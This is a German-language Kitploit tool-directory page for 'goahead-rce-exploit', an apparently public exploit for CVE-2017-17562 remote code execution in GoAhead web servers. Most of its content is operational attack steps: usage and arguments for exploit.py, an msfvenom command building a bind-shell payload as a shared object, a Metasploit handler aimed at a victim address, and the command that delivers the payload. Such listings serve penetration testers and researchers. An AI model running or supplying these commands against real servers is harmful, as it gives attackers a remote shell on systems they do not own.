Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
goahead-rce-exploit — Exploit für die Schwachstelle CVE-2017-17562, die RCE auf GoAhead (< v3.6.5) ermöglicht, wenn CGI aktiviert ist und ein CGI-Programm dynamisch gelinkt ist. | Kitploit
Tools/GitHubGitHub/nu11pointer/goahead-rce-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubnu11pointer/goahead-rce-exploit

goahead-rce-exploit

Exploit für die Schwachstelle CVE-2017-17562, die RCE auf GoAhead (< v3.6.5) ermöglicht, wenn CGI aktiviert ist und ein CGI-Programm dynamisch gelinkt ist.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
81vor 2 JahrenNoch nicht geprüft

GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remotecodeausführung

Exploit für die Schwachstelle CVE-2017-17562, die RCE auf GoAhead (< v3.6.5) ermöglicht, sofern CGI aktiviert ist und ein CGI-Programm dynamisch gelinkt ist.

Verwendung

root@kitploit:~
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]

Anforderungen

root@kitploit:~
$ python3 -m pip install -r requirements.txt

Achtung!

Sie müssen zuerst den Payload erzeugen und den Listener einrichten.
Beispiel:
(Angreifer: 192.168.1.100 - Opfer: 192.168.1.200)

root@kitploit:~
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337

Führen Sie dann in einer anderen Shell diesen Exploit aus, um den Payload zu senden, der die Reverse-Verbindung zum Listener startet!

Argumente

root@kitploit:~
Required arguments:
  --host HOST        Host running the GoAhead webserver.
  --port PORT        Port running the GoAhead webserver. Default: 80
  --payload PAYLOAD  Path to the payload.

Optional arguments:
  --ssl              Host is using SSL.
  --cgi LIST         Paths list to discover the CGI script on the GoAhead server. Default: paths.lst

Beispiel

root@kitploit:~
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
Tool herunterladen